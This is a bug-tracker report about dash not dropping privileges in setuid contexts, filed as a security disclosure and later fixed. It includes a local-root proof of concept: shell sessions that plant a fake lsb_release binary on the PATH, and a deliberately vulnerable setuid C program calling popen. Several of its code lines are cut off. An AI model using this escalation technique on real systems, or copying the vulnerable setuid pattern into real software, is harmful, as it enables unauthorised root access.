dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
dash (Debian) |
Fix Released
|
Unknown
|
|||
dash (Ubuntu) |
Fix Released
|
High
|
Marc Deslauriers |
Bug Description
Poorly written setuid programs may call 'popen' or 'system' with incorrectly specified arguments. For instance, there is a bug in vmware-mount where it calls "popen(
Now, bash has a 'privdrop' option, however debian removed this option in the 1990's:
http://
http://
Most shells will drop privs when euid != uid, because it turns out calling popen / system from setuid scripts is nearly impossible to get right (in fact, pretty much any setuid script is insanely difficult to write without a vulnerability in it.
Ensure /bin/sh is dash
antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<
# whoami
root
If we switched to a sane shell (like busybox for example.)
antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<
BusyBox v1.18.5 (Ubuntu 1:1.18.
Enter 'help' for a list of built-in commands.
/usr/local/
whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)
Now you may be saying 'hey i don't have vmware-mount handy' so instead:
antarus@goats5 ~ $ cat /tmp/silly_setuid.c
#include <stdio.h>
int main(int argc, char ** argv) {
popen(
}
antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
antarus@goats5 ~ $ sudo chown root:root silly_setuid
[sudo] password for antarus:
antarus@goats5 ~ $ sudo chmod 4755 silly_setuid
antarus@goats5 ~ $ cc -xc - -olsb_release<
antarus@goats5 ~ $ root
Distributor ID: Ubuntu
Description: Ubuntu 12.04.1 LTS
Release: 12.04
Codename: precise
antarus@goats5 ~ $ apt-cache policy dash
dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
*** 0.5.7-2ubuntu2 0
600 my-apt-mirror ubuntu-precise/main amd64 Packages
100 /var/lib/
Related branches
Changed in dash (Ubuntu): | |
status: | New → Triaged |
Changed in dash (Ubuntu): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
importance: | Undecided → High |
Changed in dash (Debian): | |
status: | Unknown → Confirmed |
Changed in dash (Debian): | |
status: | Confirmed → Fix Released |
Tavis sent a patch to upstream dash:
http:// article. gmane.org/ gmane.comp. shells. dash/841